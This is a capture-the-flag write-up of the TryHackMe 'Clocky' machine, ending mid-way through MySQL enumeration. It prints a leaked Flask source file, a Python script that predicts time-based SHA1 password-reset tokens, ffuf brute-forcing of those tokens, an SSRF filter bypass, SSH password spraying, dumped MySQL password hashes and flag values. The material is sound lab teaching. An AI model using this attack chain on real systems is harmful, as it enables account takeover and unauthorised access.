> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-clocky.md).

# THM - Clocky

## Enumeration and Foothold

### NMAP

```bash
  PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 84:1e:10:02:f1:8c:58:dc:12:84:b2:78:bf:62:a9:98 (RSA)
|   256 c2:c0:02:48:ff:5a:e1:78:a0:6f:46:21:aa:e3:dd:34 (ECDSA)
|_  256 45:83:95:74:18:d5:9a:56:9d:41:1a:be:f3:45:8a:d3 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
8000/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-robots.txt: 3 disallowed entries 
|_/*.sql$ /*.zip$ /*.bak$
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see <https://nmap.org/submit/> ).
```

#### Directory Discovery

```bash
──(ajay㉿kali)-[~]
└─$ ffuf -u <http://10.82.184.162:8000/FUZZ> -w /usr/share/wordlists/dirb/common.txt \
-e .sql,.zip,.bak -mc 200,301,302

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://10.82.184.162:8000/FUZZ>
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .sql .zip .bak 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,301,302
________________________________________________

index.zip               [Status: 200, Size: 1922, Words: 6, Lines: 11, Duration: 100ms]
robots.txt              [Status: 200, Size: 115, Words: 7, Lines: 7, Duration: 101ms]
:: Progress: [18456/18456] :: Job [1/1] :: 392 req/sec :: Duration: [0:00:48] :: Errors: 0 ::

```

running ffuf identified a zip file and robots.txt.

### HTTP

robots.txt gave the first flag

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTYfzrbpOqcEnrXv3csME%2Fimage.png?alt=media&amp;token=9714ca8a-e5cb-45cd-a412-8a402c90c34f" alt=""><figcaption></figcaption></figure>

browsing to index.zip download the file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmapTtKLQC4rwb9iQOkP4%2Fimage.png?alt=media&amp;token=bec30651-9e73-4fa1-80a4-41dd0970bf23" alt=""><figcaption></figcaption></figure>

unzipping the file gives flag 2

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ ls
index.zip 
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ unzip index.zip              
Archive:  index.zip
  inflating: app.py                  
 extracting: flag2.txt               
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ ls
app.py  flag2.txt  index.zip 
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ cat flag2.txt
THM{1d3d62de34a3692518d03ec474159eaf}

```

there is python script called app.py

```bash
**app.py**

# Not done with correct imports
# Some missing, some needs to be added
# Some are not in use...? Check flask imports please. Many are not needed
from flask import Flask, flash, redirect, render_template, request, session, abort, Response
from time import gmtime, strftime
from dotenv import load_dotenv
import os, pymysql.cursors, datetime, base64, requests

# Execute "database.sql" before using this
load_dotenv()
db = os.environ.get('db')

# Connect to MySQL database
connection = pymysql.connect(host="localhost",
								user="clocky_user",
								password=db,
								db="clocky",
								cursorclass=pymysql.cursors.DictCursor)

app = Flask(__name__)

# A new app will be deployed in prod soon
# Implement rate limiting on all endpoints
# Let's just use a WAF...?
# Not done (16/05-2023, jane)
@app.route("/")
def home():
	current_time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
	return render_template("index.html", current_time=current_time)

# Done (16/05-2023, jane)
@app.route("/administrator", methods=["GET", "POST"])
def administrator():
	if session.get("logged_in"):
		return render_template("admin.html")

	else:
		if request.method == "GET":
			return render_template("login.html")
		
		if request.method == "POST":
			user_provided_username = request.form["username"]
			user_provided_password = request.form["password"]

			
			try:
				with connection.cursor() as cursor:

					sql = "SELECT ID FROM users WHERE username = %s"
					cursor.execute(sql, (user_provided_username))
					
					user_id = cursor.fetchone()
					user_id = user_id["ID"]

					sql = "SELECT password FROM passwords WHERE ID=%s AND password=%s"
					cursor.execute(sql, (user_id, user_provided_password))

					if cursor.fetchone():
						session["logged_in"] = True
						return redirect("/dashboard", code=302)

			except:
				pass
		
			message = "Invalid username or password"
			return render_template("login.html", message=message)

# Work in progress (10/05-2023, jane)
# Is the db really necessary?
@app.route("/forgot_password", methods=["GET", "POST"])
def forgot_password():
	if session.get("logged_in"):
		return render_template("admin.html")

	else:
		if request.method == "GET":
			return render_template("forgot_password.html")
		
		if request.method == "POST":
			username = request.form["username"]
			username = username.lower()

			try:
				with connection.cursor() as cursor:

					sql = "SELECT username FROM users WHERE username = %s"
					cursor.execute(sql, (username))

					if cursor.fetchone():
						value = datetime.datetime.now()
						lnk = str(value)[:-4] + " . " + username.upper()
						lnk = hashlib.sha1(lnk.encode("utf-8")).hexdigest()
						sql = "UPDATE reset_token SET token=%s WHERE username = %s"
						cursor.execute(sql, (lnk, username))
						connection.commit()

			except:
				pass

			message = "A reset link has been sent to your e-mail"
			return render_template("forgot_password.html", message=message)

# Done
@app.route("/password_reset", methods=["GET"])
def password_reset():
        if request.method == "GET":
                # Need to agree on the actual parameter here (12/05-2023, jane)
                if request.args.get("TEMPORARY"):
                        # Not done (11/05-2023, clarice)
                        # user_provided_token = request.args.get("TEMPORARY")

                        try:
                                with connection.cursor() as cursor:

                                        sql = "SELECT token FROM reset_token WHERE token = %s"
                                        cursor.execute(sql, (user_provided_token))
                                        if cursor.fetchone():
                                                return render_template("password_reset.html", token=user_provided_token)

                                        else:
                                                return "<h2>Invalid token</h2>"

                        except:
                                pass

                else:
                        return "<h2>Invalid parameter</h2>"
        return "<h2>Invalid parameter</h2>"

# Debug enabled during dev
# TURN OFF ONCE IN PROD!
# This can be very dangerous
# ref <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug#pin-protected-path-traversal>

# Use gunicorn?
if __name__ == "__main__":
	app.secret_key = os.urandom(256)
	app.run(host="0.0.0.0", port="8080", debug=True)

```

The source code reveals hidden directories : administrator, forgot\_password, password\_reset

Also found database creds.

```bash
user="clocky_user"
db="clocky"
```

passwords are stored as plain text.

```bash
SELECT password FROM passwords WHERE ID=%s AND password=%s
```

there is also a mention of link to hack trick werkzeug pin protected path traversal&#x20;

```bash
# ref <https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug#pin-protected-path-traversal>
```

browsing to /administrator gives a admin login page

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsTcDEdzn8kBDFG5uXBUq%2Fimage.png?alt=media&amp;token=a10a67b6-b886-47c9-96f1-19c59824c377" alt=""><figcaption></figcaption></figure>

also the forgot\_password gives a password reset functionality

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlaKEnpAmnAFyXzNRp77Y%2Fimage.png?alt=media&amp;token=35adcf1f-5f3d-41da-988a-4208a324e3ff" alt=""><figcaption></figcaption></figure>

browsing to /password\_reset throws error saying it accepts a token parameter

that said i gonna fuzz the application for hidden parameters.

### Fuzzing for Parameters

```bash
──(ajay㉿kali)-[~/Tools]
└─$ ffuf -u "<http://10.82.184.162:8080/password_reset?FUZZ=test>" \
-w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-mc 200 -fs 26

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://10.82.184.162:8080/password_reset?FUZZ=test>
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
 :: Filter           : Response size: 26
________________________________________________

token                   [Status: 200, Size: 22, Words: 2, Lines: 1, Duration: 151ms]
:: Progress: [6453/6453] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:49] :: Errors: 0 ::

```

throwing a garbage value in the token value results an error says token invalid which confirms we need a valid token to reset

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F95jTS80DyAwSaFptrlBG%2Fimage.png?alt=media&amp;token=2ebac032-d3e7-4355-a9a8-ce329d2eef08" alt=""><figcaption></figcaption></figure>

Recall the logic from the `forgot_password` route in the source code:

1. **Username:** Usually `administrator` or `admin` (try `administrator` first as it's the route name).
2. **Format:** `YYYY-MM-DD HH:MM:SS.ms . USERNAME` (The `[:-4]` truncates the milliseconds to one decimal place).
3. **Hashing:** The resulting string is encoded in UTF-8 and hashed using **SHA1**.

### Resetting the admin password

#### Step 1: Trigger the Reset

Send a POST request to `/forgot_password` with `username=administrator`. Note the exact time on your local machine or, better yet, look at the `Date` header in the HTTP response from the server.

#### Step 2: Create a Prediction Script

Because you don't know the *exact* millisecond the server processed the request, you need to generate a few possible hashes for that specific second.

Here is a Python script to generate the potential tokens:

```bash
import hashlib

# Configuration
# Make sure this matches the Date header EXACTLY: YYYY-MM-DD HH:MM:SS
server_date = "2026-02-24 20:18:07" 
username = "ADMINISTRATOR" 

def generate_wordlist():
    try:
        with open("tokens.txt", "w") as f:
            for i in range(100):
                ms = f"{i:02d}"
                # Format: YYYY-MM-DD HH:MM:SS.ms . USERNAME
                payload = f"{server_date}.{ms} . {username}"
                token = hashlib.sha1(payload.encode("utf-8")).hexdigest()
                f.write(token + "\n")
        print(f"Successfully created tokens.txt with 100 entries.")
    except Exception as e:
        print(f"Error writing file: {e}")

if __name__ == "__main__":
    generate_wordlist()
```

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ ls
app.py  flag2.txt  index.zip  script.py  UOgST_Bk
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ python script.py
Successfully created tokens.txt with 100 entries.
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ ls
app.py  flag2.txt  index.zip  script.py  tokens.txt  UOgST_Bk
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ cat tokens.txt
5c8e21dd344a991f5a1d45b72d402ce299fb6c45
1c30f5c4036faecdd1164a4ee9ad20884aa38697
1e2ee671363fa84f863cd6c2de680bc1cdc5fa74
d9c513af420322a1ab5de5f183f294bc1a1e1328
036881f3ae074a7dac0a3dda87eab6e709ef7fe0
508cf92fe497f15c0be8f6d01121b027664b463a
987438f4663a41e8c666d1e5fe9a499e33f33b43
```

now i can use ffuf again to check for valid tokens

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ ffuf -u "<http://10.82.184.162:8080/password_reset?token=FUZZ>" -w tokens.txt -mc 200 -fs 22

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : <http://10.82.184.162:8080/password_reset?token=FUZZ>
 :: Wordlist         : FUZZ: /home/ajay/Downloads/tokens.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
 :: Filter           : Response size: 22
________________________________________________

3a805c1692743be914bef00fade1e37050c09b3c [Status: 200, Size: 1627, Words: 665, Lines: 54, Duration: 105ms]
:: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

```

with this token i can reset admin password

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmeJV2SDIfeaooJ21UI4w%2Fimage.png?alt=media&amp;token=fd74d8a4-4f31-477f-839c-14f2b0e9c427" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHqMtpH9OXDuA46LKi88r%2Fimage.png?alt=media&amp;token=60bfd635-23d1-4566-8275-24bb88de0f0e" alt=""><figcaption></figcaption></figure>

creds used: `administrator: ajay`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fhdq9VuNzcNBIpyFLqZDC%2Fimage.png?alt=media&amp;token=3e3188be-e125-4008-81a7-406e0e140000" alt=""><figcaption></figcaption></figure>

also observing the request to administrator dashboard showed a location parameter

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd3z0Il6OkiNemNHZHf4S%2Fimage.png?alt=media&amp;token=4ef45666-ce80-4180-95f9-350bcf7577d9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FicJHwRID9lBoEueLJDbc%2Fimage.png?alt=media&amp;token=a7a6a029-9943-4b31-a463-f9c255aa7f7d" alt=""><figcaption></figcaption></figure>

remember the `robots.txt` was hiding `.sql` files, and in `app.py` there was a comment about a file called `database.sql`

### SSRF

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FinU5VQ3qn1EApC0YQxVb%2Fimage.png?alt=media&amp;token=22883657-8ec2-4942-984b-fbea125a878e" alt=""><figcaption></figcaption></figure>

i can bypass the request by using hexal representation of 127.0.0.1

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRlfaW90RkkABlUWieC61%2Fimage.png?alt=media&amp;token=080c0e3b-d514-4ba7-963f-18e599e2c8d5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FB5q8GwgLcP20hayChID6%2Fimage.png?alt=media&amp;token=ed434c32-a048-4a3b-bdcd-798ae32d8c99" alt=""><figcaption></figcaption></figure>

found creds in the file downloaded.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvHrgzJZDjWVfZ5M0iUpp%2Fimage.png?alt=media&amp;token=d049d449-5dea-4a79-8775-83824c61d664" alt=""><figcaption></figcaption></figure>

We have three usernames : administrator, jane, clarice. lets password spray against them and identify valid creds.

```bash
──(ajay㉿kali)-[~]
└─$ ssh administrator@10.82.184.162                                       
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See <https://openssh.com/pq.html>
administrator@10.82.184.162's password: 
Permission denied, please try again.
administrator@10.82.184.162's password: 

                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~]
└─$ ssh jane@10.82.184.162
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See <https://openssh.com/pq.html>
jane@10.82.184.162's password: 
Permission denied, please try again.
jane@10.82.184.162's password: 
```

And the creds work for clarice.

## Shell as Clarice

```bash
──(ajay㉿kali)-[~]
└─$ ssh clarice@10.82.184.162
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See <https://openssh.com/pq.html>
clarice@10.82.184.162's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-138-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/pro>

 System information as of Tue 24 Feb 2026 08:50:19 PM UTC

  System load:  0.0               Processes:             106
  Usage of /:   53.6% of 8.02GB   Users logged in:       0
  Memory usage: 62%               IPv4 address for eth0: 10.82.184.162
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   <https://ubuntu.com/engage/secure-kubernetes-at-the-edge>

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at <https://ubuntu.com/esm>

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.

clarice@ip-10-82-184-162:~$ 
```

```bash
clarice@ip-10-82-184-162:~$ ls
app  flag5.txt  snap
clarice@ip-10-82-184-162:~$ cat flag5.txt
THM{e57dfa35e62d518cfd215dd7729d0877}
clarice@ip-10-82-184-162:~$ 
```

[app.py](http://app.py/) gave us the database credentials earlier.

```bash
clarice@ip-10-82-184-162:~$ netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 localhost:mysql         localhost:56324         ESTABLISHED
tcp        0      0 localhost:56324         localhost:mysql         ESTABLISHED
tcp        0    300 ip-10-82-184-162.eu:ssh ip-192-168-170-21:59598 ESTABLISHED

```

mysql is running so i can sue the creds to login to mysql server

### Enumerating MYSQL on SSH Shell&#x20;

```bash
clarice@ip-10-82-184-162:~/app$ mysql -u clocky_user -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
```

```bash
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| clocky             |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use clocky;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+------------------+
| Tables_in_clocky |
+------------------+
| passwords        |
| users            |
+------------------+
2 rows in set (0.00 sec)
```

```bash
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| clocky             |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+------------------------------------------------------+
| Tables_in_mysql                                      |
+------------------------------------------------------+
| columns_priv                                         |
| component                                            |
| db                                                   |
| default_roles                                        |
| engine_cost                                          |
| func                                                 |
| general_log                                          |
| global_grants                                        |
| gtid_executed                                        |
| help_category                                        |
| help_keyword                                         |
| help_relation                                        |
| help_topic                                           |
| innodb_index_stats                                   |
| innodb_table_stats                                   |
| password_history                                     |
| plugin                                               |
| procs_priv                                           |
| proxies_priv                                         |
| replication_asynchronous_connection_failover         |
| replication_asynchronous_connection_failover_managed |
| replication_group_configuration_version              |
| replication_group_member_actions                     |
| role_edges                                           |
| server_cost                                          |
| servers                                              |
| slave_master_info                                    |
| slave_relay_log_info                                 |
| slave_worker_info                                    |
| slow_log                                             |
| tables_priv                                          |
| time_zone                                            |
| time_zone_leap_second                                |
| time_zone_name                                       |
| time_zone_transition                                 |
| time_zone_transition_type                            |
| user                                                 |
+------------------------------------------------------+
37 rows in set (0.00 sec)

mysql> 
```

The table user is unreadable.

```bash
mysql> select * from user;
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------------------+--------------------------+----------------------------+---------------+-------------+-----------------+----------------------+-----------------------+------------------------------------------------------------------------+------------------+-----------------------+-------------------+----------------+------------------+----------------+------------------------+---------------------+--------------------------+-----------------+
| Host      | User             | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher             | x509_issuer              | x509_subject               | max_questions | max_updates | max_connections | max_user_connections | plugin                | authentication_string                                                  | password_expired | password_last_changed | password_lifetime | account_locked | Create_role_priv | Drop_role_priv | Password_reuse_history | Password_reuse_time | Password_require_current | User_attributes |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------------------+--------------------------+----------------------------+---------------+-------------+-----------------+----------------------+-----------------------+------------------------------------------------------------------------+------------------+-----------------------+-------------------+----------------+------------------+----------------+------------------------+---------------------+--------------------------+-----------------+
| %         | clocky_user      | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$~g]5C]]hmVcZUf8oIT96B7VRZhQibsUhSe5eKbHm4Lq1ks8pzxDkNM9 | N                | 2023-05-21 06:40:47   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
| %         | dev              | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y  /xuiN2%#pIV5@8=o1xaxXD13/Mh0rlloe/WqcmmaBDMF6r7wjvFGgoTSaB | N                | 2023-05-21 06:40:47   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | clocky_user      | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$cg▒|\>B^:
       yCR0kSV+XwNDxm2lDD5W3J9551gjlVmOZ9Z9hH2Szailxm2VkL. | N                | 2023-05-21 06:40:47   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | debian-sys-maint | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$Ebh3▒N5a#f6HM?xF*uSqjNbbUYGitDq/yFLM8LbauDh83QtraQaETy6nZWtWc2 | N                | 2023-02-22 05:57:08   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | dev              | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$
8w|Q!N]rZX!mZ\?ok/WxQEdeRLNgqXpWEf4sJonZecawFUizD8FokeI5F. | N                | 2023-05-21 06:40:47   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | mysql.infoschema | Y           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | N                | 2023-02-22 05:57:08   |              NULL | Y              | N                | N              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | mysql.session    | N           | N           | N           | N           | N           | N         | N           | Y             | N            | N         | N          | N               | N          | N          | N            | Y          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | N                | 2023-02-22 05:57:08   |              NULL | Y              | N                | N              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | mysql.sys        | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | caching_sha2_password | $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED | N                | 2023-02-22 05:57:08   |              NULL | Y              | N                | N              |                   NULL |                NULL | NULL                     | NULL            |
| localhost | root             | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          | 0x                     | 0x                       | 0x                         |             0 |           0 |               0 |                    0 | auth_socket           |                                                                        | N                | 2023-02-22 05:57:07   |              NULL | N              | Y                | Y              |                   NULL |                NULL | NULL                     | NULL            |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------------------+--------------------------+----------------------------+---------------+-------------+-----------------+----------------------+-----------------------+------------------------------------------------------------------------+------------------+-----------------------+-------------------+----------------+------------------+----------------+------------------------+---------------------+--------------------------+-----------------+
9 rows in set (0.00 sec)

mysql> 

```

```bash
mysql> select * from user\G
*************************** 1. row ***************************
                    <SNIP>
              ssl_cipher: 0x
             x509_issuer: 0x
            x509_subject: 0x
           max_questions: 0
             max_updates: 0
         max_connections: 0
    max_user_connections: 0
                  plugin: caching_sha2_password
   authentication_string: $A$005$Ebh3▒N5a#f6HM?xF*uSqjNbbUYGitDq/yFLM8LbauDh83QtraQaETy6nZWtWc2
        password_expired: N
   password_last_changed: 2023-02-22 05:57:08
       password_lifetime: NULL
          account_locked: N
        Create_role_priv: Y
          Drop_role_priv: Y
  Password_reuse_history: NULL
     Password_reuse_time: NULL
Password_require_current: NULL
         User_attributes: NULL
*************************** 5. row ***************************
                    Host: localhost
                    User: dev
             Select_priv: Y
             Insert_priv: Y
             Update_priv: Y
             Delete_priv: Y
             Create_priv: Y
             
             max_updates: 0
         max_connections: 0
    max_user_connections: 0
                  plugin: caching_sha2_password
   authentication_string: $A$005$
8w|Q!N]rZX!mZ\?ok/WxQEdeRLNgqXpWEf4sJonZecawFUizD8FokeI5F.
        password_expired: N
   password_last_changed: 2023-05-21 06:40:47
       password_lifetime: NULL
          account_locked: N
        Create_role_priv: Y
          Drop_role_priv: Y
  Password_reuse_history: NULL
     Password_reuse_time: NULL
Password_require_current: NULL
         User_attributes: NULL
*************************** 6. row ***************************
                    Host: localhost
                    User: mysql.infoschema
             Select_priv: Y
             Insert_priv: N
           
             x509_issuer: 0x
            x509_subject: 0x
           max_questions: 0
